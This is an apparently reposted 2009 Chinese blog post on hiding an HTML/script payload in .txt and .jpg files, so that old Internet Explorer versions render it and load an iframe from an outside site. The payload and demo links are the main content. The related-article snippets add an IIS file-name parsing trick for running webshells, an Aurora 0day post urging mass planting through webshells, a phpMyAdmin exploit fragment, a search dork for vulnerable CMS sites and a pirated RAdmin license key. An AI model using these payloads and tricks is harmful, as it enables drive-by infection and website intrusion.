矛与盾--TXT文件和图片文件挂马0DAY

转载

242400 2009-06-14 13:42:04 博主文章分类：【信息安全】

文章标签 职场休闲挂马0DAY 文章分类 网络安全

TXT挂马

TXT文件中插入一段JAVA代码后后边的HTML代码就会被IE执行

受影响版本IE6 7 8

代码：

‘><script>alert(sb)</script>
<iframe src=http://snight.org width=500 height=500></iframe>

演示http://snight.org/test.txt

图片挂马

将上述代码保存为JPG文件，然后通过IE访问，IE还是同样会解析图片中的HTML代码

受影响版本

IE6 7

演示：http://snight.org/0.jpg

上一篇：矛与盾-3889抓肉鸡的过程

下一篇：矛与盾--IP欺骗原理精解及防范手段综述

提问和评论都可以，用心的回复会被更多人看到评论

发布评论

相关文章

0Day漏洞防御篇：GeoServer CVE-2024-36401远程代码执行漏洞

高危预警

服务器用户交互 jar
Python中列表数据的保存与读取：以txt文件为例

引言在Python编程中，我们经常需要处理各种类型的数据，包括列表。列表是一种非常灵活的数据结构，它可以包含多种类型的元素，包括数值、字符串、布尔值等。有时，我们需要将这些列表数据保存到文件中，以便之后能够读取和重新使用这些数据。txt文件是一种常见且简单的文件类型，非常适合用于存储列表数据。本文将介绍如何将一组列表（三个以上，数值类型不一）保存到txt文件中，并提供相应的读取方法。通过本文的学习

数据字符串 txt文件
Python开发中，requirements.txt文件的作用

requirements.txt 文件是一个文本文件，用于列出一个Python项目所依赖的所有包及其版本信息。它的主要作用是确保项目的所有开发者和用户在同样的环境下工作，避免由于依赖版本不一致导致的问题。requirements.txt 的作用列出项目依赖：列出项目所需要的所有Python包以及它们的版本号。环境一致性：保证在不同环境中（开发环境、测试环境、生产环境）安装相同版本的依赖包，确保项目

依赖包 Python NumPy
TXT文件和图片文件挂马

‘><script>alert(sb)</script><iframe src=http://baidu.com width=500 height=500></iframe>图片挂马将上述代码保存为JPG文件，然后通过IE访问，IE还是同样会解析图片中的HTML代码,受影响版本IE6 7

职场休闲 TXT文件和图片文件挂马
解读金山网盾3.5 0day漏洞免疫技术

解读金山网盾3.5 0day漏洞免疫技术关键字：金山网盾 0day漏洞 Pwn2Own黑客大会沙箱第三届Pwn2Own黑客大会上，Apple's Safari, Mozilla's Firefox和Microsoft's Internet Explorer 8相继被黑客攻破。证明，所谓的安全浏览器本就不存在。浏览器是那样容易被入侵，其中有个很重要的原因是0day漏洞不断被发现和利用。攻击者

职场漏洞休闲免疫金山网盾
java 0day

# Java 0day漏洞科普## 引言在计算机安全领域，0day漏洞是指恶意攻击者利用尚未被软件开发者或供应商发现的软件安全漏洞。本文将介绍Java 0day漏洞的相关概念，以及如何预防和修复这些漏洞。## 什么是Java 0day漏洞？Java是一种广泛应用于跨平台开发的编程语言。由于Java应用程序可以在不同的操作系统和硬件上运行，因此它成为恶意攻击者攻击的目标之一。Java

Java java 新版本
TinyShop缓存文件获取WebShell之0day

TinyShop缓存文件获取WebShell之0day

Tiny Shop 缓存
什么叫0day和Warez？

世界上并不存在某个叫做“warez”或者“0day”这样“邪恶”的组织，“0day”是一种自发的网络运动而已，“warez”是对破解的泛称；如果有人说他属于“0day组织”，并不是说他真的在一个叫做“0day”的破解组织里干活，其真正涵义是他属于某个破解组织，而这个组织经常向0day 发布作品。

职场休闲 0day
IIS 解析0Day

当上传图片为x.asp;x.jpg时，IIS会自动解析为asp格式，所以我们只要上传后是x.asp;x.jpg这样的形式，就可以执行我们的马了，测试了下，x.php;x.jpg也是可以执行的。

职场 IIS 休闲 0Day
极光 0day漏洞

不知道是不是国内首发.17号在ST核心群拿到的，18号在虚拟机2003SERVER ie7 测试成功。不过免杀做的不好一样被杀。趁国内没有大规模更新补丁之前，在webshell上大肆放马，命中率还是挺高的。下面是生成后的页面代码,其他文件就不发了.大家有兴趣可以看下---------------------------------------------------生成器代码不发了。希望开始发的几

html 虚拟机的 webshell 命中率
MSN Editor 0DAY

简单说下利用的方法吧。点击图片上传后会出现上传页面，地址为http://www.xxx.cn/admin/uploadPic.asp?language=&editImageNum=0&editRemNum=用普通的图片上传后，地址为 http://www.xxx.cn/news/admin/uploadPic.asp?language=&editImageNum=1&am

的点击图片
phpmyadmin 0day exp

虽然还是很鸡肋（要求根目录下存在config文件夹且可写），不过好很多了。可以无视session.auto_start配置了。 #!/usr/bin/php<?phpprint_r('+---------------------------------------------------------------------------+pma3 - ph

职场 phpmyadmin 休闲 0day exp
IE 0day 分析

转自 http://www.exp-sky.org/cve-2013-1347-microsoft-internet-explorer-cgenericelement-object-use-after-free-0day-vulnerabilityCVE-2013-1347 Microsoft Internet Explorer CGenericElement Object Use A

IE 0day
网盾3.5内置专业杀毒技术首创0day漏洞免疫

金山网盾3.5上网安全必备软件作为国内首款浏览器专业防护软件，金山网盾自推出以来，深受广大网民喜爱。尤其是浏览器主页锁定、钓鱼网站拦截、搜索引擎结果鉴定等功能，帮助数亿网民成功解决了日常上网过程中遇到的各种安全问题。金山毒霸安全实验室针对木马病毒威胁的新特性，精心打造了金山网盾3.5版本。该版本以金山“云安全”服务为基础，内置专业云查杀技术，首次将专业的杀毒技术全面应用到的上网安全辅助软件之

杀毒漏洞休闲免疫网盾
矛与盾-3889抓肉鸡的过程

工具:WINNTAutoAttack自动攻击器（扫漏洞）；SQLTOOLS（SA空口令连接器）；RAMDIN影子3.0中文版（远程控制程序）（RADMIN注册码:08US9A95I+lKa9nbOLXqv0V8xqdDvKGcNcTpN2wV11iSqOCVuA6A5KKZRHc5GVMIybWomK6rNwoj8mYy8LXRFi23）； SC.exe por

职场休闲抓肉鸡
“矛”与“盾”：网络安全架构

导读：作为专职与钱打交道的行业，银行业相比其他行业更加重视信息安全工作。各类网络攻击技术和手段层出不穷，除了如DDoS泛洪攻击这类网络层的攻击方式外，也有页面篡改、SQL注入、协议攻击等应用层攻击，还有利用组件漏洞或系统后门等攻击方式。

网络安全技术安全数据安全
ESPCMS通杀0day

百度关键字:inurl:index.php?ac=article&at=read&did============================================================================================================默认后台:adminsoft/index.php

职场休闲 admin 百度关键字 inurl
DZ 插件0day

通过多次测试。重要掌握dz 所有插件提权的方法。

职场插件休闲 0day DZ
关于宁盾平台Spring框架RCE 0day漏洞修复的公告

3月30日，Spring框架曝出RCE 0day漏洞，该漏洞已经被证实，Spring中存在的漏洞，结合 jdk9 及以上新版本的特性，在成功利用此漏洞可以导致权限提升，可导致任意命令执行、文件读取、后门、DoS攻击等危害。对此，宁盾第一时间完成了全面的自检...

spring spring框架文件读取
0day的NFO文件名的含义大全

0day的NFO文件名的含义大全

职场休闲 0day

官方博客	全部文章	热门标签	班级博客
了解我们	网站地图	意见反馈

鸿蒙开发者社区	51CTO学堂
51CTO	软考资讯

矛与盾--TXT文件和图片文件挂马0DAY

矛与盾--TXT文件和图片文件挂马0DAY

51CTO博客